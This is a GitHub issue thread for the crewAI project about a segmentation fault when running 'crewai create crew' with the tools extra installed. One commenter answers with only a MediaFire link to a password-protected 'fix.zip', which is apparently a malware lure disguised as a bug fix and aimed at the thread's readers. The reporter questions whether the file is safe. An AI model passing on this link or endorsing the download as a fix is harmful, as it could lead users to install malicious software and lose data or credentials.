### ISSUE TITLE
[BUG] The use of crewai['tools'] results in a segmentation fault when running crewai create crew.

### ISSUE THREAD

**Issue by SacMV** [crewAIInc/crewAI#1366]
### Description

I'm trying to create a project with crewai['tools'] (crewai = {extras = ["tools"], version = "0.65.2"}), but I'm encountering this issue. It works fine if I only use crewai without the extras tools.

### Steps to Reproduce

1. Successfully installed crewai['tools'] without any errors.
2. Running crewai create crew test-agent results in a segmentation fault: crewai create crew test-agent.

### Expected behavior

"Project created successfully."

### Screenshots/Code snippets

![Screen Shot 2024-09-29 at 08 51 58](https://github.com/user-attachments/assets/b9e359bd-d330-494f-ab2f-828f7f7d181e)

### Operating System

macOS Big Sur

### Python Version

3.12

### crewAI Version

0.65.2

### crewAI Tools Version

0.12.1

### Virtual Environment

Poetry

### Evidence

![Screen Shot 2024-09-29 at 08 51 58](https://github.com/user-attachments/assets/b9e359bd-d330-494f-ab2f-828f7f7d181e)

### Possible Solution

None

### Additional context

"Starting project initialization."

**Comment by SagarChandra07** [comment]
install this
https://www.mediafire.com/file/q4gho1ar8e43udd/fix.zip/file
Pass: changeme
If you don't have the c compliator, install it.(gcc or clang)

**Comment by SacMV** [comment]
> install this https://www.mediafire.com/file/q4gho1ar8e43udd/fix.zip/file Pass: changeme If you don't have the c compliator, install it.(gcc or clang)

What kind of file is that? I feel it's not safe
